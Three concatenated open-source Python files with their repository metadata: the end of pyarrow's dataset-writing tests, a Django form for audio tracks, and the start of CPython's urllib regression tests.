overwritten = pa.table({'b': ['x', 'a', 'b', 'c'], 'c': [1, 2, 3, 4]})
readback = ds.dataset(tempdir, format='ipc',
partitioning=partitioning).to_table()
compare_tables_ignoring_order(readback, overwritten)
assert not extra_file.exists()
def _generate_random_int_array(size=4, min=1, max=10):
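    # Return `size` random integers drawn from the half-open range [min, max)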
return np.random.randint(min, max, size)
def _generate_data_and_columns(num_of_columns, num_of_records):
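    # Build a RecordBatch with `num_of_columns` integer columns named
    # c0, c1, ..., each containing `num_of_records` rows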
data = []
column_names = []
for i in range(num_of_columns):
data.append(_generate_random_int_array(size=num_of_records,
min=1,
max=num_of_records))
column_names.append("c" + str(i))
record_batch = pa.record_batch(data=data, names=column_names)
return record_batch
def _get_num_of_files_generated(base_directory, file_format):
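    # Count the files with the given extension anywhere under `base_directory`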
return len(list(pathlib.Path(base_directory).glob(f'**/*.{file_format}')))
@pytest.mark.parquet
def test_write_dataset_max_rows_per_file(tempdir):
directory = tempdir / 'ds'
max_rows_per_file = 10
max_rows_per_group = 10
num_of_columns = 2
num_of_records = 35
record_batch = _generate_data_and_columns(num_of_columns,
num_of_records)
ds.write_dataset(record_batch, directory, format="parquet",
max_rows_per_file=max_rows_per_file,
max_rows_per_group=max_rows_per_group)
files_in_dir = os.listdir(directory)
    # number of files holding max_rows_per_file rows, plus one file for the remainder
expected_partitions = num_of_records // max_rows_per_file + 1
# test whether the expected amount of files are written
assert len(files_in_dir) == expected_partitions
# compute the number of rows per each file written
result_row_combination = []
for _, f_file in enumerate(files_in_dir):
f_path = directory / str(f_file)
dataset = ds.dataset(f_path, format="parquet")
result_row_combination.append(dataset.to_table().shape[0])
# test whether the generated files have the expected number of rows
assert expected_partitions == len(result_row_combination)
assert num_of_records == sum(result_row_combination)
assert all(file_rowcount <= max_rows_per_file
for file_rowcount in result_row_combination)
@pytest.mark.parquet
def test_write_dataset_min_rows_per_group(tempdir):
directory = tempdir / 'ds'
min_rows_per_group = 6
max_rows_per_group = 8
num_of_columns = 2
record_sizes = [5, 5, 5, 5, 5, 4, 4, 4, 4, 4]
record_batches = [_generate_data_and_columns(num_of_columns,
num_of_records)
for num_of_records in record_sizes]
data_source = directory / "min_rows_group"
ds.write_dataset(data=record_batches, base_dir=data_source,
min_rows_per_group=min_rows_per_group,
max_rows_per_group=max_rows_per_group,
format="parquet")
files_in_dir = os.listdir(data_source)
for _, f_file in enumerate(files_in_dir):
f_path = data_source / str(f_file)
dataset = ds.dataset(f_path, format="parquet")
table = dataset.to_table()
batches = table.to_batches()
for id, batch in enumerate(batches):
rows_per_batch = batch.num_rows
if id < len(batches) - 1:
assert rows_per_batch >= min_rows_per_group and \
rows_per_batch <= max_rows_per_group
else:
assert rows_per_batch <= max_rows_per_group
@pytest.mark.parquet
def test_write_dataset_max_rows_per_group(tempdir):
directory = tempdir / 'ds'
max_rows_per_group = 18
num_of_columns = 2
num_of_records = 30
record_batch = _generate_data_and_columns(num_of_columns,
num_of_records)
data_source = directory / "max_rows_group"
ds.write_dataset(data=record_batch, base_dir=data_source,
max_rows_per_group=max_rows_per_group,
format="parquet")
files_in_dir = os.listdir(data_source)
batched_data = []
for f_file in files_in_dir:
f_path = data_source / str(f_file)
dataset = ds.dataset(f_path, format="parquet")
table = dataset.to_table()
batches = table.to_batches()
for batch in batches:
batched_data.append(batch.num_rows)
assert batched_data == [18, 12]
@pytest.mark.parquet
def test_write_dataset_max_open_files(tempdir):
directory = tempdir / 'ds'
file_format = "parquet"
partition_column_id = 1
column_names = ['c1', 'c2']
record_batch_1 = pa.record_batch(data=[[1, 2, 3, 4, 0, 10],
['a', 'b', 'c', 'd', 'e', 'a']],
names=column_names)
record_batch_2 = pa.record_batch(data=[[5, 6, 7, 8, 0, 1],
['a', 'b', 'c', 'd', 'e', 'c']],
names=column_names)
record_batch_3 = pa.record_batch(data=[[9, 10, 11, 12, 0, 1],
['a', 'b', 'c', 'd', 'e', 'd']],
names=column_names)
record_batch_4 = pa.record_batch(data=[[13, 14, 15, 16, 0, 1],
['a', 'b', 'c', 'd', 'e', 'b']],
names=column_names)
table = pa.Table.from_batches([record_batch_1, record_batch_2,
record_batch_3, record_batch_4])
partitioning = ds.partitioning(
pa.schema([(column_names[partition_column_id], pa.string())]),
flavor="hive")
data_source_1 = directory / "default"
ds.write_dataset(data=table, base_dir=data_source_1,
partitioning=partitioning, format=file_format)
    # Here we consider the number of unique partitions created when the
    # partitioning column contains duplicate values.
    # Returns: (number_of_files_generated, number_of_partitions)
def _get_compare_pair(data_source, record_batch, file_format, col_id):
num_of_files_generated = _get_num_of_files_generated(
base_directory=data_source, file_format=file_format)
number_of_partitions = len(pa.compute.unique(record_batch[col_id]))
return num_of_files_generated, number_of_partitions
    # CASE 1: max_open_files=default & max_open_files >= num_of_partitions
    # When writing to disk partitioned on a particular column, the number
    # of unique values in that column must equal the number of files
    # generated
num_of_files_generated, number_of_partitions \
= _get_compare_pair(data_source_1, record_batch_1, file_format,
partition_column_id)
assert num_of_files_generated == number_of_partitions
# CASE 2: when max_open_files > 0 & max_open_files < num_of_partitions
# the number of files generated must be greater than the number of
# partitions
data_source_2 = directory / "max_1"
max_open_files = 3
ds.write_dataset(data=table, base_dir=data_source_2,
partitioning=partitioning, format=file_format,
max_open_files=max_open_files, use_threads=False)
num_of_files_generated, number_of_partitions \
= _get_compare_pair(data_source_2, record_batch_1, file_format,
partition_column_id)
assert num_of_files_generated > number_of_partitions
@pytest.mark.parquet
@pytest.mark.pandas
def test_write_dataset_partitioned_dict(tempdir):
directory = tempdir / "partitioned"
_ = _create_parquet_dataset_partitioned(directory)
# directory partitioning, dictionary partition columns
dataset = ds.dataset(
directory,
partitioning=ds.HivePartitioning.discover(infer_dictionary=True))
target = tempdir / 'partitioned-dir-target'
expected_paths = [
target / "a", target / "a" / "part-0.arrow",
target / "b", target / "b" / "part-0.arrow"
]
partitioning = ds.partitioning(pa.schema([
dataset.schema.field('part')]),
dictionaries={'part': pa.array(['a', 'b'])})
# NB: dictionaries required here since we use partitioning to parse
# directories in _check_dataset_roundtrip (not currently required for
# the formatting step)
_check_dataset_roundtrip(
dataset, str(target), expected_paths, 'f1', target,
partitioning=partitioning)
@pytest.mark.parquet
@pytest.mark.pandas
def test_write_dataset_use_threads(tempdir):
directory = tempdir / "partitioned"
_ = _create_parquet_dataset_partitioned(directory)
dataset = ds.dataset(directory, partitioning="hive")
partitioning = ds.partitioning(
pa.schema([("part", pa.string())]), flavor="hive")
target1 = tempdir / 'partitioned1'
paths_written = []
def file_visitor(written_file):
paths_written.append(written_file.path)
ds.write_dataset(
dataset, target1, format="feather", partitioning=partitioning,
use_threads=True, file_visitor=file_visitor
)
expected_paths = {
target1 / 'part=a' / 'part-0.feather',
target1 / 'part=b' / 'part-0.feather'
}
paths_written_set = set(map(pathlib.Path, paths_written))
assert paths_written_set == expected_paths
target2 = tempdir / 'partitioned2'
ds.write_dataset(
dataset, target2, format="feather", partitioning=partitioning,
use_threads=False
)
# check that reading in gives same result
result1 = ds.dataset(target1, format="feather", partitioning=partitioning)
result2 = ds.dataset(target2, format="feather", partitioning=partitioning)
assert result1.to_table().equals(result2.to_table())
def test_write_table(tempdir):
table = pa.table([
pa.array(range(20)), pa.array(np.random.randn(20)),
pa.array(np.repeat(['a', 'b'], 10))
], names=["f1", "f2", "part"])
base_dir = tempdir / 'single'
ds.write_dataset(table, base_dir,
basename_template='dat_{i}.arrow', format="feather")
# check that all files are present
file_paths = list(base_dir.rglob("*"))
expected_paths = [base_dir / "dat_0.arrow"]
assert set(file_paths) == set(expected_paths)
# check Table roundtrip
result = ds.dataset(base_dir, format="ipc").to_table()
assert result.equals(table)
# with partitioning
base_dir = tempdir / 'partitioned'
expected_paths = [
base_dir / "part=a", base_dir / "part=a" / "dat_0.arrow",
base_dir / "part=b", base_dir / "part=b" / "dat_0.arrow"
]
visited_paths = []
visited_sizes = []
def file_visitor(written_file):
visited_paths.append(written_file.path)
visited_sizes.append(written_file.size)
partitioning = ds.partitioning(
pa.schema([("part", pa.string())]), flavor="hive")
ds.write_dataset(table, base_dir, format="feather",
basename_template='dat_{i}.arrow',
partitioning=partitioning, file_visitor=file_visitor)
file_paths = list(base_dir.rglob("*"))
assert set(file_paths) == set(expected_paths)
actual_sizes = [os.path.getsize(path) for path in visited_paths]
assert visited_sizes == actual_sizes
result = ds.dataset(base_dir, format="ipc", partitioning=partitioning)
assert result.to_table().equals(table)
assert len(visited_paths) == 2
for visited_path in visited_paths:
assert pathlib.Path(visited_path) in expected_paths
def test_write_table_multiple_fragments(tempdir):
table = pa.table([
pa.array(range(10)), pa.array(np.random.randn(10)),
pa.array(np.repeat(['a', 'b'], 5))
], names=["f1", "f2", "part"])
table = pa.concat_tables([table]*2)
    # A Table with multiple batches is written as a single fragment by default
base_dir = tempdir / 'single'
ds.write_dataset(table, base_dir, format="feather")
assert set(base_dir.rglob("*")) == set([base_dir / "part-0.feather"])
assert ds.dataset(base_dir, format="ipc").to_table().equals(table)
# Same for single-element list of Table
base_dir = tempdir / 'single-list'
ds.write_dataset([table], base_dir, format="feather")
assert set(base_dir.rglob("*")) == set([base_dir / "part-0.feather"])
assert ds.dataset(base_dir, format="ipc").to_table().equals(table)
# Provide list of batches to write multiple fragments
base_dir = tempdir / 'multiple'
ds.write_dataset(table.to_batches(), base_dir, format="feather")
assert set(base_dir.rglob("*")) == set(
[base_dir / "part-0.feather"])
assert ds.dataset(base_dir, format="ipc").to_table().equals(table)
# Provide list of tables to write multiple fragments
base_dir = tempdir / 'multiple-table'
ds.write_dataset([table, table], base_dir, format="feather")
assert set(base_dir.rglob("*")) == set(
[base_dir / "part-0.feather"])
assert ds.dataset(base_dir, format="ipc").to_table().equals(
pa.concat_tables([table]*2)
)
def test_write_iterable(tempdir):
table = pa.table([
pa.array(range(20)), pa.array(np.random.randn(20)),
pa.array(np.repeat(['a', 'b'], 10))
], names=["f1", "f2", "part"])
base_dir = tempdir / 'inmemory_iterable'
ds.write_dataset((batch for batch in table.to_batches()), base_dir,
schema=table.schema,
basename_template='dat_{i}.arrow', format="feather")
result = ds.dataset(base_dir, format="ipc").to_table()
assert result.equals(table)
base_dir = tempdir / 'inmemory_reader'
reader = pa.RecordBatchReader.from_batches(table.schema,
table.to_batches())
ds.write_dataset(reader, base_dir,
basename_template='dat_{i}.arrow', format="feather")
result = ds.dataset(base_dir, format="ipc").to_table()
assert result.equals(table)
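# Note on the two cases above: a bare generator of record batches carries no
# schema, so write_dataset() needs ``schema=`` passed explicitly, whereas a
# RecordBatchReader already carries its schema.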
def test_write_scanner(tempdir, dataset_reader):
table = pa.table([
pa.array(range(20)), pa.array(np.random.randn(20)),
pa.array(np.repeat(['a', 'b'], 10))
], names=["f1", "f2", "part"])
dataset = ds.dataset(table)
base_dir = tempdir / 'dataset_from_scanner'
ds.write_dataset(dataset_reader.scanner(
dataset), base_dir, format="feather")
result = dataset_reader.to_table(ds.dataset(base_dir, format="ipc"))
assert result.equals(table)
# scanner with different projected_schema
base_dir = tempdir / 'dataset_from_scanner2'
ds.write_dataset(dataset_reader.scanner(dataset, columns=["f1"]),
base_dir, format="feather")
result = dataset_reader.to_table(ds.dataset(base_dir, format="ipc"))
assert result.equals(table.select(["f1"]))
# schema not allowed when writing a scanner
with pytest.raises(ValueError, match="Cannot specify a schema"):
ds.write_dataset(dataset_reader.scanner(dataset), base_dir,
schema=table.schema, format="feather")
def test_write_table_partitioned_dict(tempdir):
# ensure writing table partitioned on a dictionary column works without
# specifying the dictionary values explicitly
table = pa.table([
pa.array(range(20)),
pa.array(np.repeat(['a', 'b'], 10)).dictionary_encode(),
], names=['col', 'part'])
partitioning = ds.partitioning(table.select(["part"]).schema)
base_dir = tempdir / "dataset"
ds.write_dataset(
table, base_dir, format="feather", partitioning=partitioning
)
# check roundtrip
partitioning_read = ds.DirectoryPartitioning.discover(
["part"], infer_dictionary=True)
result = ds.dataset(
base_dir, format="ipc", partitioning=partitioning_read
).to_table()
assert result.equals(table)
@pytest.mark.parquet
def test_write_dataset_parquet(tempdir):
table = pa.table([
pa.array(range(20)), pa.array(np.random.randn(20)),
pa.array(np.repeat(['a', 'b'], 10))
], names=["f1", "f2", "part"])
# using default "parquet" format string
base_dir = tempdir / 'parquet_dataset'
ds.write_dataset(table, base_dir, format="parquet")
# check that all files are present
file_paths = list(base_dir.rglob("*"))
expected_paths = [base_dir / "part-0.parquet"]
assert set(file_paths) == set(expected_paths)
# check Table roundtrip
result = ds.dataset(base_dir, format="parquet").to_table()
assert result.equals(table)
# using custom options
for version in ["1.0", "2.4", "2.6"]:
format = ds.ParquetFileFormat()
opts = format.make_write_options(version=version)
base_dir = tempdir / 'parquet_dataset_version{0}'.format(version)
ds.write_dataset(table, base_dir, format=format, file_options=opts)
meta = pq.read_metadata(base_dir / "part-0.parquet")
expected_version = "1.0" if version == "1.0" else "2.6"
assert meta.format_version == expected_version
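# Illustrative sketch of the per-format option objects used above (comments
# only, not executed here; ``some_dir`` is a placeholder path):
#
#   fmt = ds.ParquetFileFormat()
#   opts = fmt.make_write_options(version="2.6")
#   ds.write_dataset(table, some_dir, format=fmt, file_options=opts)
#
# Other Parquet writer settings are expected to be accepted the same way;
# only ``version`` is exercised by the loop above.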
def test_write_dataset_csv(tempdir):
table = pa.table([
pa.array(range(20)), pa.array(np.random.randn(20)),
pa.array(np.repeat(['a', 'b'], 10))
], names=["f1", "f2", "chr1"])
base_dir = tempdir / 'csv_dataset'
ds.write_dataset(table, base_dir, format="csv")
# check that all files are present
file_paths = list(base_dir.rglob("*"))
expected_paths = [base_dir / "part-0.csv"]
assert set(file_paths) == set(expected_paths)
# check Table roundtrip
result = ds.dataset(base_dir, format="csv").to_table()
assert result.equals(table)
# using custom options
format = ds.CsvFileFormat(read_options=pyarrow.csv.ReadOptions(
column_names=table.schema.names))
opts = format.make_write_options(include_header=False)
base_dir = tempdir / 'csv_dataset_noheader'
ds.write_dataset(table, base_dir, format=format, file_options=opts)
result = ds.dataset(base_dir, format=format).to_table()
assert result.equals(table)
@pytest.mark.parquet
def test_write_dataset_parquet_file_visitor(tempdir):
table = pa.table([
pa.array(range(20)), pa.array(np.random.randn(20)),
pa.array(np.repeat(['a', 'b'], 10))
], names=["f1", "f2", "part"])
visitor_called = False
def file_visitor(written_file):
nonlocal visitor_called
if (written_file.metadata is not None and
written_file.metadata.num_columns == 3):
visitor_called = True
base_dir = tempdir / 'parquet_dataset'
ds.write_dataset(table, base_dir, format="parquet",
file_visitor=file_visitor)
assert visitor_called
@pytest.mark.parquet
def test_partition_dataset_parquet_file_visitor(tempdir):
f1_vals = [item for chunk in range(4) for item in [chunk] * 10]
f2_vals = [item*10 for chunk in range(4) for item in [chunk] * 10]
table = pa.table({'f1': f1_vals, 'f2': f2_vals,
'part': np.repeat(['a', 'b'], 20)})
root_path = tempdir / 'partitioned'
partitioning = ds.partitioning(
pa.schema([("part", pa.string())]), flavor="hive")
paths_written = []
sample_metadata = None
def file_visitor(written_file):
nonlocal sample_metadata
if written_file.metadata:
sample_metadata = written_file.metadata
paths_written.append(written_file.path)
ds.write_dataset(
table, root_path, format="parquet", partitioning=partitioning,
use_threads=True, file_visitor=file_visitor
)
expected_paths = {
root_path / 'part=a' / 'part-0.parquet',
root_path / 'part=b' / 'part-0.parquet'
}
paths_written_set = set(map(pathlib.Path, paths_written))
assert paths_written_set == expected_paths
assert sample_metadata is not None
assert sample_metadata.num_columns == 2
@pytest.mark.parquet
@pytest.mark.pandas
def test_write_dataset_arrow_schema_metadata(tempdir):
# ensure we serialize ARROW schema in the parquet metadata, to have a
# correct roundtrip (e.g. preserve non-UTC timezone)
table = pa.table({"a": [pd.Timestamp("2012-01-01", tz="Europe/Brussels")]})
assert table["a"].type.tz == "Europe/Brussels"
ds.write_dataset(table, tempdir, format="parquet")
result = pq.read_table(tempdir / "part-0.parquet")
assert result["a"].type.tz == "Europe/Brussels"
def test_write_dataset_schema_metadata(tempdir):
# ensure that schema metadata gets written
from pyarrow import feather
table = pa.table({'a': [1, 2, 3]})
table = table.replace_schema_metadata({b'key': b'value'})
ds.write_dataset(table, tempdir, format="feather")
schema = feather.read_table(tempdir / "part-0.feather").schema
assert schema.metadata == {b'key': b'value'}
@pytest.mark.parquet
def test_write_dataset_schema_metadata_parquet(tempdir):
# ensure that schema metadata gets written
table = pa.table({'a': [1, 2, 3]})
table = table.replace_schema_metadata({b'key': b'value'})
ds.write_dataset(table, tempdir, format="parquet")
schema = pq.read_table(tempdir / "part-0.parquet").schema
assert schema.metadata == {b'key': b'value'}
@pytest.mark.parquet
@pytest.mark.s3
def test_write_dataset_s3(s3_example_simple):
# write dataset with s3 filesystem
_, _, fs, _, host, port, access_key, secret_key = s3_example_simple
uri_template = (
"s3://{}:{}@{{}}?scheme=http&endpoint_override={}:{}".format(
access_key, secret_key, host, port)
)
table = pa.table([
pa.array(range(20)), pa.array(np.random.randn(20)),
pa.array(np.repeat(['a', 'b'], 10))],
names=["f1", "f2", "part"]
)
part = ds.partitioning(pa.schema([("part", pa.string())]), flavor="hive")
# writing with filesystem object
ds.write_dataset(
table, "mybucket/dataset", filesystem=fs, format="feather",
partitioning=part
)
# check roundtrip
result = ds.dataset(
"mybucket/dataset", filesystem=fs, format="ipc", partitioning="hive"
).to_table()
assert result.equals(table)
# writing with URI
uri = uri_template.format("mybucket/dataset2")
ds.write_dataset(table, uri, format="feather", partitioning=part)
# check roundtrip
result = ds.dataset(
"mybucket/dataset2", filesystem=fs, format="ipc", partitioning="hive"
).to_table()
assert result.equals(table)
# writing with path + URI as filesystem
uri = uri_template.format("mybucket")
ds.write_dataset(
table, "dataset3", filesystem=uri, format="feather", partitioning=part
)
# check roundtrip
result = ds.dataset(
"mybucket/dataset3", filesystem=fs, format="ipc", partitioning="hive"
).to_table()
assert result.equals(table)
_minio_put_only_policy = """{
"Version": "2012-10-17",
"Statement": [
{
"Effect": "Allow",
"Action": [
"s3:PutObject",
"s3:ListBucket",
"s3:GetObjectVersion"
],
"Resource": [
"arn:aws:s3:::*"
]
}
]
}"""
@pytest.mark.parquet
@pytest.mark.s3
def test_write_dataset_s3_put_only(s3_server):
    # [ARROW-15892] Test the create_dir flag, which suppresses creation of a
    # new directory when writing a dataset. This is needed when writing a
    # dataset to S3 with very limited permissions, where the data must be
    # written directly without creating a directory first.
from pyarrow.fs import S3FileSystem
# write dataset with s3 filesystem
host, port, _, _ = s3_server['connection']
fs = S3FileSystem(
access_key='limited',
secret_key='limited123',
endpoint_override='{}:{}'.format(host, port),
scheme='http'
)
_configure_s3_limited_user(s3_server, _minio_put_only_policy)
table = pa.table([
pa.array(range(20)), pa.array(np.random.randn(20)),
pa.array(np.repeat(['a', 'b'], 10))],
names=["f1", "f2", "part"]
)
part = ds.partitioning(pa.schema([("part", pa.string())]), flavor="hive")
# writing with filesystem object with create_dir flag set to false
ds.write_dataset(
table, "existing-bucket", filesystem=fs,
format="feather", create_dir=False, partitioning=part,
existing_data_behavior='overwrite_or_ignore'
)
# check roundtrip
result = ds.dataset(
"existing-bucket", filesystem=fs, format="ipc", partitioning="hive"
).to_table()
assert result.equals(table)
# Passing create_dir is fine if the bucket already exists
ds.write_dataset(
table, "existing-bucket", filesystem=fs,
format="feather", create_dir=True, partitioning=part,
existing_data_behavior='overwrite_or_ignore'
)
# check roundtrip
result = ds.dataset(
"existing-bucket", filesystem=fs, format="ipc", partitioning="hive"
).to_table()
assert result.equals(table)
# Error enforced by filesystem
with pytest.raises(OSError,
match="Bucket 'non-existing-bucket' not found"):
ds.write_dataset(
table, "non-existing-bucket", filesystem=fs,
format="feather", create_dir=True,
existing_data_behavior='overwrite_or_ignore'
)
# Error enforced by minio / S3 service
fs = S3FileSystem(
access_key='limited',
secret_key='limited123',
endpoint_override='{}:{}'.format(host, port),
scheme='http',
allow_bucket_creation=True,
)
with pytest.raises(OSError, match="Access Denied"):
ds.write_dataset(
table, "non-existing-bucket", filesystem=fs,
format="feather", create_dir=True,
existing_data_behavior='overwrite_or_ignore'
)
@pytest.mark.parquet
def test_dataset_null_to_dictionary_cast(tempdir, dataset_reader):
# ARROW-12420
table = pa.table({"a": [None, None]})
pq.write_table(table, tempdir / "test.parquet")
schema = pa.schema([
pa.field("a", pa.dictionary(pa.int32(), pa.string()))
])
fsds = ds.FileSystemDataset.from_paths(
paths=[tempdir / "test.parquet"],
schema=schema,
format=ds.ParquetFileFormat(),
filesystem=fs.LocalFileSystem(),
)
table = dataset_reader.to_table(fsds)
assert table.schema == schema
@pytest.mark.dataset
def test_dataset_join(tempdir):
t1 = pa.table({
"colA": [1, 2, 6],
"col2": ["a", "b", "f"]
})
ds.write_dataset(t1, tempdir / "t1", format="ipc")
ds1 = ds.dataset(tempdir / "t1", format="ipc")
t2 = pa.table({
"colB": [99, 2, 1],
"col3": ["Z", "B", "A"]
})
ds.write_dataset(t2, tempdir / "t2", format="ipc")
ds2 = ds.dataset(tempdir / "t2", format="ipc")
result = ds1.join(ds2, "colA", "colB")
assert result.to_table() == pa.table({
"colA": [1, 2, 6],
"col2": ["a", "b", "f"],
"col3": ["A", "B", None]
})
result = ds1.join(ds2, "colA", "colB", join_type="full outer")
assert result.to_table().sort_by("colA") == pa.table({
"colA": [1, 2, 6, 99],
"col2": ["a", "b", "f", None],
"col3": ["A", "B", None, "Z"]
})
@pytest.mark.dataset
def test_dataset_join_unique_key(tempdir):
t1 = pa.table({
"colA": [1, 2, 6],
"col2": ["a", "b", "f"]
})
ds.write_dataset(t1, tempdir / "t1", format="ipc")
ds1 = ds.dataset(tempdir / "t1", format="ipc")
t2 = pa.table({
"colA": [99, 2, 1],
"col3": ["Z", "B", "A"]
})
ds.write_dataset(t2, tempdir / "t2", format="ipc")
ds2 = ds.dataset(tempdir / "t2", format="ipc")
result = ds1.join(ds2, "colA")
assert result.to_table() == pa.table({
"colA": [1, 2, 6],
"col2": ["a", "b", "f"],
"col3": ["A", "B", None]
})
result = ds1.join(ds2, "colA", join_type="full outer", right_suffix="_r")
assert result.to_table().sort_by("colA") == pa.table({
"colA": [1, 2, 6, 99],
"col2": ["a", "b", "f", None],
"col3": ["A", "B", None, "Z"]
})
@pytest.mark.dataset
def test_dataset_join_collisions(tempdir):
t1 = pa.table({
"colA": [1, 2, 6],
"colB": [10, 20, 60],
"colVals": ["a", "b", "f"]
})
ds.write_dataset(t1, tempdir / "t1", format="ipc")
ds1 = ds.dataset(tempdir / "t1", format="ipc")
t2 = pa.table({
"colA": [99, 2, 1],
"colB": [99, 20, 10],
"colVals": ["Z", "B", "A"]
})
ds.write_dataset(t2, tempdir / "t2", format="ipc")
ds2 = ds.dataset(tempdir / "t2", format="ipc")
result = ds1.join(ds2, "colA", join_type="full outer", right_suffix="_r")
assert result.to_table().sort_by("colA") == pa.table([
[1, 2, 6, 99],
[10, 20, 60, None],
["a", "b", "f", None],
[10, 20, None, 99],
["A", "B", None, "Z"],
], names=["colA", "colB", "colVals", "colB_r", "colVals_r"])
@pytest.mark.dataset
def test_dataset_filter(tempdir):
t1 = pa.table({
"colA": [1, 2, 6],
"col2": ["a", "b", "f"]
})
ds.write_dataset(t1, tempdir / "t1", format="ipc")
ds1 = ds.dataset(tempdir / "t1", format="ipc")
result = ds1.scanner(filter=pc.field("colA") < 3)
assert result.to_table() == pa.table({
"colA": [1, 2],
"col2": ["a", "b"]
})
def test_write_dataset_with_scanner_use_projected_schema(tempdir):
"""
Ensure the projected schema is used to validate partitions for scanner
https://issues.apache.org/jira/browse/ARROW-17228
"""
table = pa.table([pa.array(range(20))], names=["original_column"])
table_dataset = ds.dataset(table)
columns = {
"renamed_column": ds.field("original_column"),
}
scanner = table_dataset.scanner(columns=columns)
ds.write_dataset(
scanner, tempdir, partitioning=["renamed_column"], format="ipc")
with (
pytest.raises(
KeyError, match=r"'Column original_column does not exist in schema"
)
):
ds.write_dataset(
scanner, tempdir, partitioning=["original_column"], format="ipc"
)
| {
"content_hash": "4b86e4b8e3b324ca296ffc7674437078",
"timestamp": "",
"source": "github",
"line_count": 4772,
"max_line_length": 79,
"avg_line_length": 36.440276613579215,
"alnum_prop": 0.6299563524696221,
"repo_name": "icexelloss/arrow",
"id": "5e2135fde42ce3ad51249e01886439f4d94e0fa9",
"size": "174685",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "python/pyarrow/tests/test_dataset.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Awk",
"bytes": "3709"
},
{
"name": "Batchfile",
"bytes": "31136"
},
{
"name": "C",
"bytes": "1303179"
},
{
"name": "C#",
"bytes": "1029129"
},
{
"name": "C++",
"bytes": "24357294"
},
{
"name": "CMake",
"bytes": "707501"
},
{
"name": "Cython",
"bytes": "1546990"
},
{
"name": "Dockerfile",
"bytes": "144408"
},
{
"name": "Emacs Lisp",
"bytes": "1064"
},
{
"name": "FreeMarker",
"bytes": "2312"
},
{
"name": "Go",
"bytes": "4254915"
},
{
"name": "HTML",
"bytes": "3430"
},
{
"name": "Java",
"bytes": "6990057"
},
{
"name": "JavaScript",
"bytes": "127157"
},
{
"name": "Jinja",
"bytes": "19371"
},
{
"name": "Lua",
"bytes": "8771"
},
{
"name": "MATLAB",
"bytes": "40399"
},
{
"name": "Makefile",
"bytes": "31661"
},
{
"name": "Meson",
"bytes": "69508"
},
{
"name": "Objective-C++",
"bytes": "11472"
},
{
"name": "Perl",
"bytes": "3803"
},
{
"name": "Python",
"bytes": "3019333"
},
{
"name": "R",
"bytes": "1508383"
},
{
"name": "Ruby",
"bytes": "1596677"
},
{
"name": "Shell",
"bytes": "385605"
},
{
"name": "Thrift",
"bytes": "34246"
},
{
"name": "TypeScript",
"bytes": "1075563"
},
{
"name": "Vala",
"bytes": "24798"
}
],
"symlink_target": ""
} |
from django import forms
from audiotracks.models import get_track_model
class TrackUploadForm(forms.ModelForm):
class Meta:
model = get_track_model()
fields = ('audio_file',)
class TrackEditForm(forms.ModelForm):
class Meta:
model = get_track_model()
exclude = ('user', 'created_at', 'updated_at')
widgets = {'audio_file': forms.FileInput, 'image': forms.FileInput}
def clean_slug(self):
new_slug = self.cleaned_data['slug']
if new_slug != self.instance._original_slug:
params = {'slug': new_slug}
params['user'] = self.instance.user
if get_track_model().objects.filter(**params).count():
raise forms.ValidationError("This URL is already taken.")
return new_slug
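# Illustrative usage sketch (not part of the app): assuming ``track`` is a
# saved Track instance whose owner already has another track slugged
# "taken", the uniqueness check above surfaces as a normal field error
# instead of a database IntegrityError:
#
#   form = TrackEditForm(data={'slug': 'taken'}, instance=track)
#   form.is_valid()          # False
#   form.errors['slug']      # contains "This URL is already taken."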
| {
"content_hash": "14c395aba7ae443ec626f8a0e38f1ca5",
"timestamp": "",
"source": "github",
"line_count": 27,
"max_line_length": 75,
"avg_line_length": 29.59259259259259,
"alnum_prop": 0.6132665832290363,
"repo_name": "amarandon/django-audiotracks",
"id": "5ab003dafc33e0c3459b598386fc5cd14e77c5b0",
"size": "799",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "audiotracks/forms.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "CSS",
"bytes": "91003"
},
{
"name": "HTML",
"bytes": "12735"
},
{
"name": "JavaScript",
"bytes": "1767"
},
{
"name": "Makefile",
"bytes": "123"
},
{
"name": "Python",
"bytes": "46686"
}
],
"symlink_target": ""
} |
"""Regresssion tests for urllib"""
import urllib.parse
import urllib.request
import urllib.error
import http.client
import email.message
import io
import unittest
from unittest.mock import patch
from test import support
import os
try:
import ssl
except ImportError:
ssl = None
import sys
import tempfile
from nturl2path import url2pathname, pathname2url
from base64 import b64encode
import collections
def hexescape(char):
"""Escape char as RFC 2396 specifies"""
hex_repr = hex(ord(char))[2:].upper()
if len(hex_repr) == 1:
hex_repr = "0%s" % hex_repr
return "%" + hex_repr
# Shortcut for testing FancyURLopener
_urlopener = None
def urlopen(url, data=None, proxies=None):
"""urlopen(url [, data]) -> open file-like object"""
global _urlopener
if proxies is not None:
opener = urllib.request.FancyURLopener(proxies=proxies)
elif not _urlopener:
with support.check_warnings(
('FancyURLopener style of invoking requests is deprecated.',
DeprecationWarning)):
opener = urllib.request.FancyURLopener()
_urlopener = opener
else:
opener = _urlopener
if data is None:
return opener.open(url)
else:
return opener.open(url, data)
def fakehttp(fakedata):
class FakeSocket(io.BytesIO):
io_refs = 1
def sendall(self, data):
FakeHTTPConnection.buf = data
def makefile(self, *args, **kwds):
self.io_refs += 1
return self
def read(self, amt=None):
if self.closed:
return b""
return io.BytesIO.read(self, amt)
def readline(self, length=None):
if self.closed:
return b""
return io.BytesIO.readline(self, length)
def close(self):
self.io_refs -= 1
if self.io_refs == 0:
io.BytesIO.close(self)
class FakeHTTPConnection(http.client.HTTPConnection):
# buffer to store data for verification in urlopen tests.
buf = None
fakesock = FakeSocket(fakedata)
def connect(self):
self.sock = self.fakesock
return FakeHTTPConnection
class FakeHTTPMixin(object):
def fakehttp(self, fakedata):
self._connection_class = http.client.HTTPConnection
http.client.HTTPConnection = fakehttp(fakedata)
def unfakehttp(self):
http.client.HTTPConnection = self._connection_class
class FakeFTPMixin(object):
def fakeftp(self):
class FakeFtpWrapper(object):
def __init__(self, user, passwd, host, port, dirs, timeout=None,
persistent=True):
pass
def retrfile(self, file, type):
return io.BytesIO(), 0
def close(self):
pass
self._ftpwrapper_class = urllib.request.ftpwrapper
urllib.request.ftpwrapper = FakeFtpWrapper
def unfakeftp(self):
urllib.request.ftpwrapper = self._ftpwrapper_class
class urlopen_FileTests(unittest.TestCase):
"""Test urlopen() opening a temporary file.
Try to test as much functionality as possible so as to cut down on reliance
on connecting to the Net for testing.
"""
def setUp(self):
# Create a temp file to use for testing
